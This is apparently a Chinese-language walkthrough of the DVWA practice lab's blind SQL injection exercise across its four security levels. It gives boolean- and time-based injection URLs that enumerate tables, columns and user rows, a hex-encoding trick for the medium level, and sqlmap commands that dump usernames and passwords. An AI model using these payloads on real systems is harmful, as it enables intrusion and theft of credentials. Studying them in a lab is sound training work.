---level: low---
1.采用bool法(猜具体数据采用二分法)
-- table count
http://192.168.43.140/vulnerabilities/sqli_blind/?id=1%27%20and%20(select%20count(table_name)%20from%20information_schema.tables%20where%20table_schema=database())=2--%20&Submit=Submit#
-- table name length
http://192.168.43.140/vulnerabilities/sqli_blind/?id=1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1-- &Submit=Submit#
-- table name
http://192.168.43.140/vulnerabilities/sqli_blind/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97-- &Submit=Submit#
--table column count , 表名为users
http://192.168.43.140/vulnerabilities/sqli_blind/?id=1' and (select count(column_name) from information_schema.columns where table_name='users')=1-- &Submit=Submit#
--table column name
http://192.168.43.140/vulnerabilities/sqli_blind/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>97-- &Submit=Submit#
--table data
http://192.168.43.140/vulnerabilities/sqli_blind/?id=1' and ascii(substr((select user from users limit 0,1),1,1))=97-- &Submit=Submit#
2.采用时间法
--主入口确定
http://192.168.43.140/vulnerabilities/sqli_blind/?id=1' and sleep(5)-- &Submit=Submit#
--当前数据库名的长度
http://192.168.43.140/vulnerabilities/sqli_blind/?id=1' and if(length(database())=5, sleep(5), 1)-- &Submit=Submit#
-- database name
http://192.168.43.140/vulnerabilities/sqli_blind/?id=1' and if(ascii(substr(database(),1,1))>97, sleep(5), 1)-- &Submit=Submit#
-- table count
http://192.168.43.140/vulnerabilities/sqli_blind/?id=1' and if((select count(table_name) from information_schema.tables where table_schema=database())=2, sleep(5), 1)-- &Submit=Submit#
之后的方法就是重复利用bool法的sql语句,填写在if的条件里挨个爆出信息
---level: medium---
Medium级别的代码利用mysql_real_escape_string函数对特殊符号
\x00,\n,\r,\,’,”,\x1a进行转义,同时前端页面设置了下拉选择表单,希望以此来控制用户的输入。执行语句跟low一样。
特殊符号内的数据如果确定了,可以直接写其十六机制数据传值,例如:
1 and (select count(column_name) from information_schema.columns where table_name= 0×7573657273)=8 #,(0×7573657273为users的16进制),显示存在,说明uers表有8个字段。
---level: high---
跟sql输入的high难点一样,但是High级别的代码利用cookie传递参数id,当SQL查询结果为空时,会执行函数sleep(seconds),目的是为了扰乱基于时间的盲注。同时在 SQL查询语句中添加了LIMIT 1,希望以此控制只输出一个结果。但由于服务器端执行sleep函数,会使得基于时间盲注的准确性受到影响。
sqlMap:
sqlmap -u "http://192.168.43.140/vulnerabilities/sqli_blind/#" --data "id=1&Submit=Submit#" --cookie="PHPSESSID=hl82sb1n97kl75hun6adsbo6cd; security=low" --batch -D dvwa -T users -C user,first_name,last_name,password,user_id --dump
sqlmap -u "192.168.43.140/vulnerabilities/sqli_blind/cookie-input.php" --second-url "http://192.168.43.140/vulnerabilities/sqli_blind/" --data "id=1&Submit=Submit#" --cookie="id=1; PHPSESSID=bij9f2e5j3bq130k9chgkpkfgc; security=high" --batch -D dvwa -T users -C user,first_name,last_name,password,user_id --dump
---level: impossible---
Impossible级别的代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入,Anti-CSRF token机制的加入了进一步提高了安全性。
引用:https://www.freebuf.com/articles/web/120985.html